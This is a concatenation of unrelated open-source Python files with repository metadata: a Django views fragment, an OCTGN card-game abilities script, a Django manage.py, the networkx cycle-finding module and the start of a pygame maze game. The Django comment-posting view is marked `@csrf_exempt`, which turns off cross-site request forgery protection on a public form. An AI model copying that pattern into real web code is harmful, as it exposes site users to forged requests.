                xmlResponse.hide(".collection > a[href=\"" + module.get_absolute_url() + "\"]")
            for isemester in Semester.objects.all(): # TODO: Factorisation
                result = Module.objects.filter(semester=isemester, subject__in=subject, teacher__in=teacher).exists()
                xmlResponse.disable("#id_semester > [value=\"" + str(isemester.id) + "\"]", not result)
            for isubject in Subject.objects.all():
                result = Module.objects.filter(semester__in=semester, subject=isubject, teacher__in=teacher).exists()
                xmlResponse.disable("#id_subject > [value=\"" + str(isubject.id) + "\"]", not result)
            for iteacher in Teacher.objects.all():
                result = Module.objects.filter(semester__in=semester, subject__in=subject, teacher=iteacher).exists()
                xmlResponse.disable("#id_teacher > [value=\"" + str(iteacher.id) + "\"]", not result)
            # Re-initialize the Materialize select widgets client-side.
            xmlResponse.js("$(\"select\").material_select();")
            return HttpResponse(xmlResponse, content_type="text/xml")
    else:
        form = ModulesForm()
    return render(request, "profs/modules.html", locals())
@csrf_exempt
def module(request, semester, subject, teacher):
    """Module detail page identified by (semester, subject, teacher) slugs.

    Shows validated comments and handles the add-comment form.  The
    template context is passed via locals(), so the local variable names
    are part of the template contract -- do not rename them.
    """
    # Re-bind the slug parameters to their model instances.
    semester = Semester.objects.get(slug=semester)
    subject = Subject.objects.get(slug=subject)
    teacher = Teacher.objects.get(slug=teacher)
    module = Module.objects.get(semester=semester, subject=subject, teacher=teacher)
    # Only moderator-validated comments are shown.
    comments = module.comments.all().filter(validated=True)
    if request.method == "POST":
        form = AddCommentForm(request.POST)
        if form.is_valid():
            new_comment = form.save(commit=False) # form is a ModelForm
            new_comment.module = module
            new_comment.save()
            # 'thanks' is only defined on successful POST; the template
            # presumably checks for it -- confirm.
            thanks = createThanks()
    else:
        form = AddCommentForm()
    return render(request, "profs/module.html", locals())
|
LeMinaw/minaw.net
|
profs/views.py
|
Python
|
gpl-3.0
| 3,465
|
# Python Scripts for the Card Fighters' Clash definition for OCTGN
# Copyright (C) 2013 Raohmaru
# This python script is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this script. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
# Abilities class
#---------------------------------------------------------------------------
class RulesAbilities():
    """ Class to handle card's abilities """
    # Registry mapping ability name -> descriptor dict (event hook,
    # player-facing message, and check/lifecycle callbacks).
    items = {}
    @staticmethod
    def register(name, event, checkFunc = None, onAdded = None, onRemoved = "abl_removed"):
        """Register an ability descriptor under *name*.

        checkFunc/onRemoved may be the *names* of module-level functions
        (strings) that the event system resolves later -- see
        abl_genericListener's eval.
        """
        msg = MSG_AB[name] if name in MSG_AB else None
        RulesAbilities.items[name] = {
            'event' : event,
            'msg' : msg,
            'checkFunc': checkFunc,
            'onAdded' : onAdded,
            'onRemoved': onRemoved
        }
    @staticmethod
    def addAll(abilites, card_id):
        # Attach every ability in the list to the given card.
        for ability in abilites:
            RulesAbilities.add(ability, card_id)
    @staticmethod
    def add(abilityName, target_id, source_id = None, restr = None):
        """Attach a registered ability to a card or player by id."""
        if abilityName in RulesAbilities.items:
            ability = RulesAbilities.items[abilityName]
            obj = getPlayerOrCard(target_id)
            debug("-- adding ability '{}' to {}", abilityName, obj)
            abl_add(ability, target_id, source_id, restr)
            # Fire the optional one-shot hook for immediate side effects.
            if ability['onAdded']:
                ability['onAdded'](obj, restr)
        else:
            debug("-- ability not found: {}", abilityName)
    @staticmethod
    def remove(ability, card_id):
        """Detach an ability's event listener from a card, notifying players."""
        card = Card(card_id)
        debug("-- removing ability '{}' from {}", ability, card)
        if ability in RulesAbilities.items:
            if removeGameEventListener(card_id, RulesAbilities.items[ability]['event'], 'abl_genericListener'):
                notify("{} has lost the {} ability".format(card, ability))
#---------------------------------------------------------------------------
# Related functions
#---------------------------------------------------------------------------
def getPlayerOrCard(id):
    """Resolve an OCTGN object id into a Player or, failing that, a Card."""
    known_player_ids = [p._id for p in players]
    if id in known_player_ids:
        return Player(id)
    return Card(id)
def getObjName(obj):
    """Return the display name of a player/card, accepting a raw id too."""
    if isinstance(obj, (int, long)):
        obj = getPlayerOrCard(obj)
    # Players expose .Name, cards expose .name.
    return obj.Name if hasattr(obj, 'Name') else obj.name
def getTextualRestr(restr):
    """Return a human-readable suffix for a restriction pair.

    *restr* is expected to be a falsy value (no restriction) or a
    (prefix, keyword) sequence.  Known keywords are formatted through
    RS_KW_RESTR_LABELS with the affected player; unknown keywords are
    returned verbatim.
    """
    if not restr:
        return ''
    if restr[1] in RS_KW_RESTR_LABELS:
        player = me
        if restr[0] == RS_PREFIX_OPP:
            player = getOpp()
        return ' ' + RS_KW_RESTR_LABELS[restr[1]].format(player)
    # Bug fix: restr is a sequence, not a callable -- the original
    # `return restr(1)` raised TypeError for unknown keywords.
    return restr[1]
def notifyAbility(target_id, source_id = None, msg = None, restr = '', isWarning = False):
    """Notify (or warn) players about an ability affecting a target.

    msg is a format string receiving: target name, source card name, the
    source's 'Ability Name' property, and the textual restriction.
    """
    obj = getPlayerOrCard(target_id)
    source = obj
    if source_id is not None:
        source = Card(source_id)
    if msg is not None:
        # Warnings use the popup channel, notifications the game log.
        func = warning if isWarning else notify
        name = obj
        if isPlayer(obj) or isWarning:
            # Address the local player as 'You' in warning popups.
            if isPlayer(obj) and isWarning:
                name = 'You'
            else:
                name = getObjName(obj)
        func(msg.format(name, source.Name, source.properties['Ability Name'], restr))
#---------------------------------------------------------------------------
# Abilities functions
#---------------------------------------------------------------------------
def abl_add(abl, obj_id, source_id = None, restr = None):
    """Hook an ability descriptor's listener onto a target id.

    Registers abl_genericListener for the descriptor's event; on success
    (and when the descriptor has a message) announces the ability.
    """
    event = abl['event']
    msg = abl['msg']
    checkFunc = abl['checkFunc']
    onRemove = abl['onRemoved']
    debug(">>> abl_add({}, {}, {}, {}, {}, {}, {})", obj_id, event, source_id, restr, msg, checkFunc, onRemove)
    eventAdded = addGameEventListener(event, 'abl_genericListener', obj_id, source_id, restr, [obj_id, source_id, msg, checkFunc, restr], onRemove = onRemove)
    if eventAdded and msg:
        # msg[0] is the "gained ability" variant (msg[1], if present, is
        # used when the ability expires -- see abl_removed).
        notifyAbility(obj_id, source_id if source_id else obj_id, msg[0], getTextualRestr(restr))
def abl_genericListener(target_id, obj_id, source_id = None, msgOrFunc = None, checkFunc = None, restr = None):
    """ Checks if the original card with the ability is equal to the second card the system wants to check """
    debug(">>> abl_genericListener({}, {}, {}, {}, {})", target_id, obj_id, source_id, msgOrFunc, checkFunc)
    callFunc = False
    # Some registrations pass the callback *name* in the message slot;
    # detect that by type (Python 2 basestring) and treat it as the check
    # function, forcing its invocation regardless of target.
    if checkFunc is None and isinstance(msgOrFunc, basestring):
        checkFunc = msgOrFunc
        callFunc = True
    if target_id == obj_id or callFunc:
        if checkFunc is None:
            debug("Ability callback: False")
            return False
        else:
            debug("Invoking ability callback: {}", checkFunc)
            # checkFunc is the name of a module-level function; resolve it
            # at call time.  NOTE: eval of an internal constant, not of
            # player-supplied input.
            checkFunc = eval(checkFunc)
            return checkFunc(target_id)
    return True
def callback_false(obj_id):
    """Ability check callback that unconditionally answers False."""
    return False
def abl_unfreezable(obj_id):
    # GameEvents.Attacks callback: tag the attacking card with the
    # Unfreezable marker.  Always returns False (return-value semantics
    # are defined by the event system -- confirm).
    setMarker(Card(obj_id), 'Unfreezable')
    return False
def abl_pierce(obj_id):
    # GameEvents.Blocked callback: tag the card with the Pierce marker.
    # Always returns False (return-value semantics defined by the event
    # system -- confirm).
    setMarker(Card(obj_id), 'Pierce')
    return False
def abl_frosted_added(card, restr = None):
    # onAdded hook for 'frosted': make the card skip its unfreeze step,
    # unless it is already flagged as never unfreezing.
    if not hasMarker(card, 'Cannot Unfreeze'):
        doesNotUnfreeze(card, restr)
def abl_removeFrost(obj_id):
    # CallOnRemove hook for 'frosted': toggle the does-not-unfreeze
    # state back off when the ability goes away.
    card = Card(obj_id)
    if hasMarker(card, 'Cannot Unfreeze'):
        doesNotUnfreeze(card)
    return False
def abl_cantattack_added(card, restr = None):
    # onAdded hook for 'cantattack': abort an attack already in progress.
    if isAttacking(card):
        cancelAttack(card)
def abl_cantblock_added(card, restr = None):
    # onAdded hook for 'cantblock': mark the card and abort a block
    # already in progress.
    setMarker(card, 'Cannot Block')
    if isBlocking(card):
        cancelBlock(card)
def abl_cantblock_removed(obj_id, source_id, msg, checkFunc, restr = None):
    # onRemoved hook for 'cantblock': clear the marker set on add.
    removeMarker(Card(obj_id), 'Cannot Block')
    # It's mandatory to call this function
    abl_removed(obj_id, source_id, msg, checkFunc, restr)
def abl_rush_added(card, restr = None):
    # onAdded hook for 'rush': drop the summoning-sickness marker so the
    # card can act the turn it arrives.
    if hasMarker(card, 'Just Entered'):
        removeMarker(card, 'Just Entered')
def abl_removed(obj_id, source_id, msg, checkFunc, restr = None):
    """
    On removed ability callback function.
    """
    # If msg has 2 items it means that it is a on/off message.
    # Then we want to show the message when the effect is gone because of the restr cleanup.
    if restr and msg and len(msg) == 2:
        notify(msg[1].format(getObjName(obj_id)))
# --- Ability registry -------------------------------------------------
# Each ability is bound to the hook/event that triggers it.  String
# arguments name module-level callback functions resolved lazily by
# abl_genericListener (via eval).
RulesAbilities.register('unblockable', Hooks.CanBeBlocked)
RulesAbilities.register('cantattack', Hooks.BeforeAttack, onAdded = abl_cantattack_added)
RulesAbilities.register('cantblock', Hooks.BeforeBlock, onAdded = abl_cantblock_added, onRemoved = 'abl_cantblock_removed')
RulesAbilities.register('cantplayac', Hooks.BeforePlayAC)
RulesAbilities.register('cantplayre', Hooks.BeforePlayRE)
RulesAbilities.register('preventpierce', Hooks.PreventPierce)
RulesAbilities.register('rush', Hooks.PlayAsFresh, onAdded = abl_rush_added)
RulesAbilities.register('unlimitedbackup', Hooks.BackupLimit, 'callback_false')
RulesAbilities.register('pierce', GameEvents.Blocked, 'abl_pierce')
RulesAbilities.register('unfreezable', GameEvents.Attacks, 'abl_unfreezable')
RulesAbilities.register('frosted', Hooks.CallOnRemove, 'abl_removeFrost', abl_frosted_added)
|
raohmaru/CFC
|
o8g/Scripts/rs/RuleScript_abilities.py
|
Python
|
gpl-3.0
| 7,534
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Standard Django manage.py entry point: point Django at the project
    # settings, then hand argv to the management command dispatcher.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "checkmate.settings")
    # Imported here so a missing Django install fails with a clear
    # traceback at invocation time.
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
|
esrefozturk/checkmate
|
checkmate/manage.py
|
Python
|
gpl-3.0
| 252
|
"""
========================
Cycle finding algorithms
========================
"""
from collections import defaultdict
import networkx as nx
from networkx.utils import not_implemented_for, pairwise
__all__ = [
"cycle_basis",
"simple_cycles",
"recursive_simple_cycles",
"find_cycle",
"minimum_cycle_basis",
]
@not_implemented_for("directed")
@not_implemented_for("multigraph")
def cycle_basis(G, root=None):
    """ Returns a list of cycles which form a basis for cycles of G.
    A basis for cycles of a network is a minimal collection of
    cycles such that any cycle in the network can be written
    as a sum of cycles in the basis.  Here summation of cycles
    is defined as "exclusive or" of the edges. Cycle bases are
    useful, e.g. when deriving equations for electric circuits
    using Kirchhoff's Laws.
    Parameters
    ----------
    G : NetworkX Graph
    root : node, optional
       Specify starting node for basis.
    Returns
    -------
    A list of cycle lists.  Each cycle list is a list of nodes
    which forms a cycle (loop) in G.
    Examples
    --------
    >>> G = nx.Graph()
    >>> nx.add_cycle(G, [0, 1, 2, 3])
    >>> nx.add_cycle(G, [0, 3, 4, 5])
    >>> print(nx.cycle_basis(G, 0))
    [[3, 4, 5, 0], [1, 2, 3, 0]]
    Notes
    -----
    This is adapted from algorithm CACM 491 [1]_.
    References
    ----------
    .. [1] Paton, K. An algorithm for finding a fundamental set of
       cycles of a graph. Comm. ACM 12, 9 (Sept 1969), 514-518.
    See Also
    --------
    simple_cycles
    """
    gnodes = set(G.nodes())
    cycles = []
    while gnodes:  # loop over connected components
        if root is None:
            root = gnodes.pop()
        stack = [root]
        pred = {root: root}
        used = {root: set()}
        while stack:  # walk the spanning tree finding cycles
            z = stack.pop()  # use last-in so cycles easier to find
            zused = used[z]
            for nbr in G[z]:
                if nbr not in used:  # new node
                    pred[nbr] = z
                    stack.append(nbr)
                    used[nbr] = {z}
                elif nbr == z:  # self loops
                    cycles.append([z])
                elif nbr not in zused:  # found a cycle
                    pn = used[nbr]
                    cycle = [nbr, z]
                    p = pred[z]
                    # Walk predecessors back until the two tree paths meet.
                    while p not in pn:
                        cycle.append(p)
                        p = pred[p]
                    cycle.append(p)
                    cycles.append(cycle)
                    used[nbr].add(z)
        # Remove this component's nodes and restart on the next one.
        gnodes -= set(pred)
        root = None
    return cycles
@not_implemented_for("undirected")
def simple_cycles(G):
    """Find simple cycles (elementary circuits) of a directed graph.
    A `simple cycle`, or `elementary circuit`, is a closed path where
    no node appears twice. Two elementary circuits are distinct if they
    are not cyclic permutations of each other.
    This is a nonrecursive, iterator/generator version of Johnson's
    algorithm [1]_. There may be better algorithms for some cases [2]_ [3]_.
    Parameters
    ----------
    G : NetworkX DiGraph
       A directed graph
    Returns
    -------
    cycle_generator: generator
       A generator that produces elementary cycles of the graph.
       Each cycle is represented by a list of nodes along the cycle.
    Examples
    --------
    >>> edges = [(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)]
    >>> G = nx.DiGraph(edges)
    >>> len(list(nx.simple_cycles(G)))
    5
    To filter the cycles so that they don't include certain nodes or edges,
    copy your graph and eliminate those nodes or edges before calling
    >>> copyG = G.copy()
    >>> copyG.remove_nodes_from([1])
    >>> copyG.remove_edges_from([(0, 1)])
    >>> len(list(nx.simple_cycles(copyG)))
    3
    Notes
    -----
    The implementation follows pp. 79-80 in [1]_.
    The time complexity is $O((n+e)(c+1))$ for $n$ nodes, $e$ edges and $c$
    elementary circuits.
    References
    ----------
    .. [1] Finding all the elementary circuits of a directed graph.
       D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
       https://doi.org/10.1137/0204007
    .. [2] Enumerating the cycles of a digraph: a new preprocessing strategy.
       G. Loizou and P. Thanish, Information Sciences, v. 27, 163-182, 1982.
    .. [3] A search strategy for the elementary cycles of a directed graph.
       J.L. Szwarcfiter and P.E. Lauer, BIT NUMERICAL MATHEMATICS,
       v. 16, no. 2, 192-204, 1976.
    See Also
    --------
    cycle_basis
    """
    def _unblock(thisnode, blocked, B):
        # Iteratively clear the blocked status for thisnode and everything
        # recorded as waiting on it in B.
        stack = {thisnode}
        while stack:
            node = stack.pop()
            if node in blocked:
                blocked.remove(node)
                stack.update(B[node])
                B[node].clear()
    # Johnson's algorithm requires some ordering of the nodes.
    # We assign the arbitrary ordering given by the strongly connected comps
    # There is no need to track the ordering as each node removed as processed.
    # Also we save the actual graph so we can mutate it. We only take the
    # edges because we do not want to copy edge and node attributes here.
    subG = type(G)(G.edges())
    sccs = [scc for scc in nx.strongly_connected_components(subG) if len(scc) > 1]
    # Johnson's algorithm exclude self cycle edges like (v, v)
    # To be backward compatible, we record those cycles in advance
    # and then remove from subG
    for v in subG:
        if subG.has_edge(v, v):
            yield [v]
            subG.remove_edge(v, v)
    while sccs:
        scc = sccs.pop()
        sccG = subG.subgraph(scc)
        # order of scc determines ordering of nodes
        startnode = scc.pop()
        # Processing node runs "circuit" routine from recursive version
        path = [startnode]
        blocked = set()  # vertex: blocked from search?
        closed = set()  # nodes involved in a cycle
        blocked.add(startnode)
        B = defaultdict(set)  # graph portions that yield no elementary circuit
        stack = [(startnode, list(sccG[startnode]))]  # sccG gives comp nbrs
        while stack:
            thisnode, nbrs = stack[-1]
            if nbrs:
                nextnode = nbrs.pop()
                if nextnode == startnode:
                    # Back at the start: the current path is a cycle.
                    yield path[:]
                    closed.update(path)
                    # print "Found a cycle", path, closed
                elif nextnode not in blocked:
                    path.append(nextnode)
                    stack.append((nextnode, list(sccG[nextnode])))
                    closed.discard(nextnode)
                    blocked.add(nextnode)
                    continue
            # done with nextnode... look for more neighbors
            if not nbrs:  # no more nbrs
                if thisnode in closed:
                    _unblock(thisnode, blocked, B)
                else:
                    for nbr in sccG[thisnode]:
                        if thisnode not in B[nbr]:
                            B[nbr].add(thisnode)
                stack.pop()
                # assert path[-1] == thisnode
                path.pop()
        # done processing this node
        H = subG.subgraph(scc)  # make smaller to avoid work in SCC routine
        sccs.extend(scc for scc in nx.strongly_connected_components(H) if len(scc) > 1)
@not_implemented_for("undirected")
def recursive_simple_cycles(G):
    """Find simple cycles (elementary circuits) of a directed graph.
    A `simple cycle`, or `elementary circuit`, is a closed path where
    no node appears twice. Two elementary circuits are distinct if they
    are not cyclic permutations of each other.
    This version uses a recursive algorithm to build a list of cycles.
    You should probably use the iterator version called simple_cycles().
    Warning: This recursive version uses lots of RAM!
    Parameters
    ----------
    G : NetworkX DiGraph
       A directed graph
    Returns
    -------
    A list of cycles, where each cycle is represented by a list of nodes
    along the cycle.
    Example:
    >>> edges = [(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)]
    >>> G = nx.DiGraph(edges)
    >>> nx.recursive_simple_cycles(G)
    [[0], [2], [0, 1, 2], [0, 2], [1, 2]]
    See Also
    --------
    cycle_basis (for undirected graphs)
    Notes
    -----
    The implementation follows pp. 79-80 in [1]_.
    The time complexity is $O((n+e)(c+1))$ for $n$ nodes, $e$ edges and $c$
    elementary circuits.
    References
    ----------
    .. [1] Finding all the elementary circuits of a directed graph.
       D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
       https://doi.org/10.1137/0204007
    See Also
    --------
    simple_cycles, cycle_basis
    """
    # Jon Olav Vik, 2010-08-09
    def _unblock(thisnode):
        """Recursively unblock and remove nodes from B[thisnode]."""
        if blocked[thisnode]:
            blocked[thisnode] = False
            while B[thisnode]:
                _unblock(B[thisnode].pop())
    def circuit(thisnode, startnode, component):
        # Johnson's CIRCUIT routine: extend the path from thisnode and
        # record any elementary circuit returning to startnode.
        closed = False  # set to True if elementary path is closed
        path.append(thisnode)
        blocked[thisnode] = True
        for nextnode in component[thisnode]:  # direct successors of thisnode
            if nextnode == startnode:
                result.append(path[:])
                closed = True
            elif not blocked[nextnode]:
                if circuit(nextnode, startnode, component):
                    closed = True
        if closed:
            _unblock(thisnode)
        else:
            for nextnode in component[thisnode]:
                if thisnode not in B[nextnode]:  # TODO: use set for speedup?
                    B[nextnode].append(thisnode)
        path.pop()  # remove thisnode from path
        return closed
    path = []  # stack of nodes in current path
    blocked = defaultdict(bool)  # vertex: blocked from search?
    B = defaultdict(list)  # graph portions that yield no elementary circuit
    result = []  # list to accumulate the circuits found
    # Johnson's algorithm exclude self cycle edges like (v, v)
    # To be backward compatible, we record those cycles in advance
    # and then remove from subG
    # NOTE(review): this mutates the caller's graph -- self-loop edges
    # are removed from G and never restored.
    for v in G:
        if G.has_edge(v, v):
            result.append([v])
            G.remove_edge(v, v)
    # Johnson's algorithm requires some ordering of the nodes.
    # They might not be sortable so we assign an arbitrary ordering.
    ordering = dict(zip(G, range(len(G))))
    for s in ordering:
        # Build the subgraph induced by s and following nodes in the ordering
        subgraph = G.subgraph(node for node in G if ordering[node] >= ordering[s])
        # Find the strongly connected component in the subgraph
        # that contains the least node according to the ordering
        strongcomp = nx.strongly_connected_components(subgraph)
        mincomp = min(strongcomp, key=lambda ns: min(ordering[n] for n in ns))
        component = G.subgraph(mincomp)
        if len(component) > 1:
            # smallest node in the component according to the ordering
            startnode = min(component, key=ordering.__getitem__)
            for node in component:
                blocked[node] = False
                B[node][:] = []
            dummy = circuit(startnode, startnode, component)
    return result
def find_cycle(G, source=None, orientation=None):
    """Returns a cycle found via depth-first traversal.
    The cycle is a list of edges indicating the cyclic path.
    Orientation of directed edges is controlled by `orientation`.
    Parameters
    ----------
    G : graph
        A directed/undirected graph/multigraph.
    source : node, list of nodes
        The node from which the traversal begins. If None, then a source
        is chosen arbitrarily and repeatedly until all edges from each node in
        the graph are searched.
    orientation : None | 'original' | 'reverse' | 'ignore' (default: None)
        For directed graphs and directed multigraphs, edge traversals need not
        respect the original orientation of the edges.
        When set to 'reverse' every edge is traversed in the reverse direction.
        When set to 'ignore', every edge is treated as undirected.
        When set to 'original', every edge is treated as directed.
        In all three cases, the yielded edge tuples add a last entry to
        indicate the direction in which that edge was traversed.
        If orientation is None, the yielded edge has no direction indicated.
        The direction is respected, but not reported.
    Returns
    -------
    edges : directed edges
        A list of directed edges indicating the path taken for the loop.
        If no cycle is found, then an exception is raised.
        For graphs, an edge is of the form `(u, v)` where `u` and `v`
        are the tail and head of the edge as determined by the traversal.
        For multigraphs, an edge is of the form `(u, v, key)`, where `key` is
        the key of the edge. When the graph is directed, then `u` and `v`
        are always in the order of the actual directed edge.
        If orientation is not None then the edge tuple is extended to include
        the direction of traversal ('forward' or 'reverse') on that edge.
    Raises
    ------
    NetworkXNoCycle
        If no cycle was found.
    Examples
    --------
    In this example, we construct a DAG and find, in the first call, that there
    are no directed cycles, and so an exception is raised. In the second call,
    we ignore edge orientations and find that there is an undirected cycle.
    Note that the second call finds a directed cycle while effectively
    traversing an undirected graph, and so, we found an "undirected cycle".
    This means that this DAG structure does not form a directed tree (which
    is also known as a polytree).
    >>> G = nx.DiGraph([(0, 1), (0, 2), (1, 2)])
    >>> try:
    ...     nx.find_cycle(G, orientation='original')
    ... except:
    ...     pass
    ...
    >>> list(nx.find_cycle(G, orientation='ignore'))
    [(0, 1, 'forward'), (1, 2, 'forward'), (0, 2, 'reverse')]
    See Also
    --------
    simple_cycles
    """
    # tailhead() extracts (tail, head) from an edge tuple as yielded by
    # nx.edge_dfs under the chosen orientation.
    if not G.is_directed() or orientation in (None, "original"):
        # Undirected, or directed traversed in the original direction:
        # the edge tuple already starts with (tail, head).
        def tailhead(edge):
            return edge[:2]
    elif orientation == "reverse":
        # Every edge is walked backwards: swap the endpoints.
        def tailhead(edge):
            return edge[1], edge[0]
    elif orientation == "ignore":
        # edge_dfs tags each yielded edge with the direction it was
        # actually traversed in; honour that tag.
        def tailhead(edge):
            if edge[-1] == "reverse":
                return edge[1], edge[0]
            return edge[:2]
    explored = set()  # nodes fully searched by earlier start nodes
    cycle = []
    final_node = None
    for start_node in G.nbunch_iter(source):
        if start_node in explored:
            # No loop is possible.
            continue
        edges = []
        # All nodes seen in this iteration of edge_dfs
        seen = {start_node}
        # Nodes in active path.
        active_nodes = {start_node}
        previous_head = None
        for edge in nx.edge_dfs(G, start_node, orientation):
            # Determine if this edge is a continuation of the active path.
            tail, head = tailhead(edge)
            if head in explored:
                # Then we've already explored it. No loop is possible.
                continue
            if previous_head is not None and tail != previous_head:
                # This edge results from backtracking.
                # Pop until we get a node whose head equals the current tail.
                # So for example, we might have:
                #  (0, 1), (1, 2), (2, 3), (1, 4)
                # which must become:
                #  (0, 1), (1, 4)
                while True:
                    try:
                        popped_edge = edges.pop()
                    except IndexError:
                        # Backtracked all the way past start_node: restart
                        # the active path from the current tail.
                        edges = []
                        active_nodes = {tail}
                        break
                    else:
                        popped_head = tailhead(popped_edge)[1]
                        active_nodes.remove(popped_head)
                    if edges:
                        last_head = tailhead(edges[-1])[1]
                        if tail == last_head:
                            break
            edges.append(edge)
            if head in active_nodes:
                # We have a loop!
                cycle.extend(edges)
                final_node = head
                break
            else:
                seen.add(head)
                active_nodes.add(head)
                previous_head = head
        if cycle:
            break
        else:
            # This start node yielded no cycle; everything it reached is
            # settled and need not be searched again.
            explored.update(seen)
    else:
        # for/else: loop ran to completion without `break`, i.e. no cycle.
        assert len(cycle) == 0
        raise nx.exception.NetworkXNoCycle("No cycle found.")
    # We now have a list of edges which ends on a cycle.
    # So we need to remove from the beginning edges that are not relevant.
    # (relies on `i`/`edge` leaking out of the for loop)
    for i, edge in enumerate(cycle):
        tail, head = tailhead(edge)
        if tail == final_node:
            break
    return cycle[i:]
@not_implemented_for("directed")
@not_implemented_for("multigraph")
def minimum_cycle_basis(G, weight=None):
    """ Returns a minimum weight cycle basis for G
    Minimum weight means a cycle basis for which the total weight
    (length for unweighted graphs) of all the cycles is minimum.
    Parameters
    ----------
    G : NetworkX Graph
    weight: string
        name of the edge attribute to use for edge weights
    Returns
    -------
    A list of cycle lists.  Each cycle list is a list of nodes
    which forms a cycle (loop) in G. Note that the nodes are not
    necessarily returned in a order by which they appear in the cycle
    Examples
    --------
    >>> G=nx.Graph()
    >>> nx.add_cycle(G, [0,1,2,3])
    >>> nx.add_cycle(G, [0,3,4,5])
    >>> print([sorted(c) for c in nx.minimum_cycle_basis(G)])
    [[0, 1, 2, 3], [0, 3, 4, 5]]
    References:
        [1] Kavitha, Telikepalli, et al. "An O(m^2n) Algorithm for
        Minimum Cycle Basis of Graphs."
        http://link.springer.com/article/10.1007/s00453-007-9064-z
        [2] de Pina, J. 1995. Applications of shortest path methods.
        Ph.D. thesis, University of Amsterdam, Netherlands
    See Also
    --------
    simple_cycles, cycle_basis
    """
    # We first split the graph in connected subgraphs; a cycle basis of G
    # is the union of the bases of its connected components.
    return sum(
        (_min_cycle_basis(G.subgraph(c), weight) for c in nx.connected_components(G)),
        [],
    )
def _min_cycle_basis(comp, weight):
    """Minimum weight cycle basis of the connected graph ``comp``.

    Implements the de Pina scheme as refined by Kavitha et al. [1]:
    maintain a list of "witness" edge-sets orthogonal to all cycles found
    so far and, for each witness, find a minimum-weight cycle having odd
    overlap with it (via ``_min_cycle``).
    """
    cb = []
    # We extract the edges not in a spanning tree. We do not really need a
    # *minimum* spanning tree. That is why we call the next function with
    # weight=None. Depending on implementation, it may be faster as well
    spanning_tree_edges = list(nx.minimum_spanning_edges(comp, weight=None, data=False))
    edges_excl = [frozenset(e) for e in comp.edges() if e not in spanning_tree_edges]
    N = len(edges_excl)
    # We maintain a set of vectors orthogonal to sofar found cycles
    set_orth = [{edge} for edge in edges_excl]
    for k in range(N):
        # kth cycle is "parallel" to kth vector in set_orth
        new_cycle = _min_cycle(comp, set_orth[k], weight=weight)
        cb.append(list(set().union(*new_cycle)))
        # now update set_orth so that k+1,k+2... th elements are
        # orthogonal to the newly found cycle, as per [p. 336, 1]
        # (symmetric difference with the witness when the overlap is odd)
        base = set_orth[k]
        set_orth[k + 1 :] = [
            orth ^ base if len(orth & new_cycle) % 2 else orth
            for orth in set_orth[k + 1 :]
        ]
    return cb
def _min_cycle(G, orth, weight=None):
    """
    Computes the minimum weight cycle in G,
    orthogonal to the vector orth as per [p. 338, 1]

    Builds a two-layer "lifted" graph T over integer-relabelled nodes of
    G: an edge of G that belongs to ``orth`` becomes a pair of cross
    edges between the layers, every other edge is duplicated within each
    layer.  A shortest path in T from a node to its mirror copy then
    corresponds to a minimum-weight cycle of G using an odd number of
    ``orth`` edges.  Returns the cycle as a set of frozenset edges of G.
    """
    T = nx.Graph()
    nodes_idx = {node: idx for idx, node in enumerate(G.nodes())}
    idx_nodes = {idx: node for node, idx in nodes_idx.items()}
    nnodes = len(nodes_idx)
    # Add 2 copies of each edge in G to T. If edge is in orth, add cross edge;
    # otherwise in-plane edge
    for u, v, data in G.edges(data=True):
        uidx, vidx = nodes_idx[u], nodes_idx[v]
        edge_w = data.get(weight, 1)
        if frozenset((u, v)) in orth:
            T.add_edges_from(
                [(uidx, nnodes + vidx), (nnodes + uidx, vidx)], weight=edge_w
            )
        else:
            T.add_edges_from(
                [(uidx, vidx), (nnodes + uidx, nnodes + vidx)], weight=edge_w
            )
    # BUGFIX: edge weights in T are always stored under the "weight" key
    # (see add_edges_from above), whatever attribute name the caller used
    # for G.  The previous `weight=weight` silently fell back to hop
    # counts for a custom weight name, so the start node below could be
    # chosen from unweighted path lengths.  L8935 already used "weight".
    all_shortest_pathlens = dict(nx.shortest_path_length(T, weight="weight"))
    cross_paths_w_lens = {
        n: all_shortest_pathlens[n][nnodes + n] for n in range(nnodes)
    }
    # Now compute shortest paths in T, which translates to cycles in G
    start = min(cross_paths_w_lens, key=cross_paths_w_lens.get)
    end = nnodes + start
    min_path = nx.shortest_path(T, source=start, target=end, weight="weight")
    # Now we obtain the actual path, re-map nodes in T to those in G
    min_path_nodes = [node if node < nnodes else node - nnodes for node in min_path]
    # Now remove the edges that occur two times
    mcycle_pruned = _path_to_cycle(min_path_nodes)
    return {frozenset((idx_nodes[u], idx_nodes[v])) for u, v in mcycle_pruned}
def _path_to_cycle(path):
"""
Removes the edges from path that occur even number of times.
Returns a set of edges
"""
edges = set()
for edge in pairwise(path):
# Toggle whether to keep the current edge.
edges ^= {edge}
return edges
|
SpaceGroupUCL/qgisSpaceSyntaxToolkit
|
esstoolkit/external/networkx/algorithms/cycles.py
|
Python
|
gpl-3.0
| 21,635
|
import pygame
from pygame.locals import *
from basic_objects import MovingObject, Map
class App:
    """Minimal pygame maze game.

    A player object explores a randomly generated 10x10 maze with limited
    visibility: only the cells adjacent to the player are drawn, the rest
    of the screen stays black.  Cell codes in ``maze``: 0 = open floor,
    1 = wall, 2 = the player, 3 = the exit.
    """

    def __init__(self):
        # All resources are created lazily in on_init().
        self._maze = None
        self._moving_thing = None
        self._running = True
        self._image_black = None
        self._image_white = None
        self._image_mthing = None
        self._image_final = None

    def on_init(self):
        """Initialise pygame, generate the maze and load the tile images."""
        pygame.init()
        self._maze = Map(10, 10)
        self._maze.recursive_division_maze_generation(1, 10, 1, 10)
        self._moving_thing = MovingObject(self._maze)
        self._display_surf = pygame.display.set_mode((1000, 700), pygame.HWSURFACE)
        self._running = True
